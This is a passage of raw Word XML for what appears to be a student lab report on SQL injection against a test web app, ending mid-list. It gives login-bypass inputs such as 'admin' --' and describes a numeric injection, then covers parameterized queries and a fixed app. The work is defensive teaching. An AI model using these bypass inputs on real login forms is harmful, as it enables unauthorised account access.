        <w:t xml:space="preserve"> Enter username: </w:t>
      </w:r>
      <w:r w:rsidR="008E42A1" w:rsidRPr="008E42A1">
        <w:t>alice' --</w:t>
      </w:r>
      <w:r w:rsidR="008E42A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E0A52">
        <w:t xml:space="preserve"> and password as anything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C630109" w14:textId="5DED47BF" w:rsidR="00283515" w:rsidRDefault="00536EAB" w:rsidP="005B153E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00536EAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E6469F" wp14:editId="0ABE190A">
            <wp:extent cx="4632960" cy="1505994"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="201605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51189" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4642982" cy="1509252"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B634013" w14:textId="594F6363" w:rsidR="009E0A52" w:rsidRDefault="009E0A52" w:rsidP="003B7CEA">
      <w:r w:rsidRPr="00647F74">
        <w:t>Logged in without knowing the password</w:t>
      </w:r>
      <w:r w:rsidR="00647F74">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5543DE" w14:textId="3097C974" w:rsidR="00C91A87" w:rsidRDefault="00C91A87" w:rsidP="003B7CEA">
      <w:r>
        <w:t xml:space="preserve">Step3: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A87">
        <w:t>Numeric SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t>) In the “/search” enter the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F399C4" w14:textId="5781CFC0" w:rsidR="001B3D56" w:rsidRDefault="001B3D56" w:rsidP="00804F64">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0BDC2E" wp14:editId="70DE7A2E">
            <wp:extent cx="4679491" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="199261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2889" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4692271" cy="1719183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C207974" w14:textId="368A0A2B" w:rsidR="001B3D56" w:rsidRDefault="001B3D56" w:rsidP="003B7CEA">
      <w:r>
        <w:t>We get this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CD312" w14:textId="038B0998" w:rsidR="00C91A87" w:rsidRDefault="001B3D56" w:rsidP="00226FE1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FBB343" wp14:editId="719AC641">
            <wp:extent cx="4814638" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="13367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39614" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4828370" cy="2170252"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE3FCF" w14:textId="5E32648D" w:rsidR="00A403EF" w:rsidRDefault="00A403EF" w:rsidP="003B7CEA">
      <w:r w:rsidRPr="00A403EF">
        <w:t>Ba</w:t>
      </w:r>
      <w:r>
        <w:t>si</w:t>
      </w:r>
      <w:r w:rsidRPr="00A403EF">
        <w:t>cally</w:t>
      </w:r>
      <w:r w:rsidR="00D542D6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A403EF">
        <w:t xml:space="preserve"> it shows all products, ignoring filters</w:t>
      </w:r>
      <w:r w:rsidR="002100C9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FC1B1E" w:rsidRPr="00FC1B1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC1B1E" w:rsidRPr="00FC1B1E">
        <w:t>No quotes involved → escaping quotes is useless</w:t>
      </w:r>
      <w:r w:rsidR="00FC1B1E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2568513A" w14:textId="77777777" w:rsidR="00BC0D61" w:rsidRDefault="00BC0D61" w:rsidP="003B7CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761C7859" w14:textId="77777777" w:rsidR="00BC0D61" w:rsidRDefault="00BC0D61" w:rsidP="003B7CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2488999B" w14:textId="77777777" w:rsidR="00BC0D61" w:rsidRDefault="00BC0D61" w:rsidP="003B7CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC2E659" w14:textId="77777777" w:rsidR="00BC0D61" w:rsidRDefault="00BC0D61" w:rsidP="003B7CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6028DAA7" w14:textId="77777777" w:rsidR="00BC0D61" w:rsidRDefault="00BC0D61" w:rsidP="003B7CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674FE993" w14:textId="77777777" w:rsidR="00BC0D61" w:rsidRDefault="00BC0D61" w:rsidP="003B7CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A2A663" w14:textId="7FC0A9AE" w:rsidR="00ED23DC" w:rsidRDefault="00ED23DC" w:rsidP="003B7CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED23DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Parameterized Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51447C59" w14:textId="11D6FCAC" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>SQL Injection happens when user input is treated as SQL code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B633042" w14:textId="37911666" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>The safest defense is parameterized queries (prepared statements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F2A38" w14:textId="4036697A" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>They work by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4382CF" w14:textId="77777777" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>Fixing the SQL structure first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDF838" w14:textId="77777777" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>Adding user input safely as data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37285EF3" w14:textId="388E2F3B" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>Never build SQL queries by concatenating user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF6B9E" w14:textId="3554355A" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>Use parameterized queries for every query, not just some.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A604FFD" w14:textId="4FFBF6B1" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>Every value must be parameterized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE94A3E" w14:textId="76AB8EF6" w:rsidR="00856F2E" w:rsidRPr="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="00856F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00856F2E">
        <w:t>Table and column names cannot be parameterized—use whitelists instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD643F3" w14:textId="77777777" w:rsidR="00856F2E" w:rsidRDefault="00856F2E" w:rsidP="003B7CEA"/>
    <w:p w14:paraId="194C2FC1" w14:textId="2F9050AC" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="002555B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Observing </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED23DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Parameterized Queries</w:t>
      </w:r>
      <w:r w:rsidR="00377D7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> importance</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F475DD6" w14:textId="68C94F10" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E413AA2" w14:textId="1447DFFD" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r w:rsidRPr="002555B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24689D3E" wp14:editId="2D842A97">
            <wp:extent cx="5731510" cy="3773170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6025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82063" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3773170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589FD76" w14:textId="77777777" w:rsidR="002555B7" w:rsidRDefault="002555B7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF183C1" w14:textId="08A6E41E" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Users.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CCB975" w14:textId="1C0173E8" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r w:rsidRPr="002555B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC8407A" wp14:editId="392CD9A8">
            <wp:extent cx="5731510" cy="2918460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="213674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2519" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2918460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD3542" w14:textId="0EDED298" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r>
        <w:t>Templates/login.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15970FB0" w14:textId="6B14ADE5" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r w:rsidRPr="002555B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13600947" wp14:editId="683CB33B">
            <wp:extent cx="5731510" cy="3091180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="51086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6317" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3091180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D02D5" w14:textId="37AE8123" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r w:rsidRPr="002555B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9CE080" wp14:editId="2E26670A">
            <wp:extent cx="5731510" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8130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7492" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1722755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44C414" w14:textId="77777777" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA"/>
    <w:p w14:paraId="294CAD6E" w14:textId="3CAF6629" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD05FE" w14:textId="24BEA260" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r w:rsidRPr="002555B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40681404" wp14:editId="15AE61AF">
            <wp:extent cx="5731510" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="20107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45063" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1688465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C615D3A" w14:textId="0CD674BA" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="003B7CEA">
      <w:r>
        <w:t>Step1: (Goal: Normal testing.) Try login using the credentials: admin:admin123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABED786" w14:textId="4DDCDB21" w:rsidR="002555B7" w:rsidRDefault="002555B7" w:rsidP="00ED612D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002555B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCF66D1" wp14:editId="230ECCB5">
            <wp:extent cx="5409777" cy="1759107"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="2959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2390" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5418053" cy="1761798"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C67597" w14:textId="45A36F0D" w:rsidR="0025682D" w:rsidRDefault="0025682D" w:rsidP="003B7CEA">
      <w:r>
        <w:t xml:space="preserve">Clearly, we logged in. When tried with the invalid credentials: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B98D86" w14:textId="2ECA5A61" w:rsidR="0025682D" w:rsidRDefault="0025682D" w:rsidP="00ED612D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0025682D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23FA15AE" wp14:editId="60D3EA04">
            <wp:extent cx="5582728" cy="1794934"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64075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7428" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5600336" cy="1800595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C67B1" w14:textId="7F2A13E8" w:rsidR="0025682D" w:rsidRDefault="0025682D" w:rsidP="003B7CEA">
      <w:r>
        <w:t>Clearly, it is invalid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3C17C" w14:textId="2A17C2FF" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="003B7CEA">
      <w:r>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED612D">
        <w:t>SQL Injection Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Use credentials, </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED612D">
        <w:t xml:space="preserve">admin' </w:t>
      </w:r>
      <w:r>
        <w:t>–: anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F811D39" w14:textId="5B3AA4AA" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED612D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2BB25B" wp14:editId="2BE2DEA0">
            <wp:extent cx="5447512" cy="1786466"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="12656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99837" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480772" cy="1797373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E51A37" w14:textId="468D4716" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Clearly, we managed to login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB4B6E" w14:textId="13AE82DA" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:r>
        <w:t>Secured version of app.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7CFCB3" w14:textId="2A8673CA" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:r w:rsidRPr="00ED612D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0314D870" wp14:editId="3975D96C">
            <wp:extent cx="5731510" cy="3679190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="70275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0331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3679190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0A383" w14:textId="6B674679" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:r>
        <w:t xml:space="preserve">Now, again repeat the step2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E9985" w14:textId="6910D575" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:r w:rsidRPr="00ED612D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D9CFA2" wp14:editId="72BD4A20">
            <wp:extent cx="5731510" cy="1800860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="40667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561" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1800860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCFA92D" w14:textId="77777777" w:rsidR="00ED612D" w:rsidRPr="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:r w:rsidRPr="00ED612D">
        <w:t>Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329A0F52" w14:textId="77777777" w:rsidR="00ED612D" w:rsidRPr="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED612D">
        <w:t>Input is treated as data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A8CD0" w14:textId="77777777" w:rsidR="00ED612D" w:rsidRPr="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
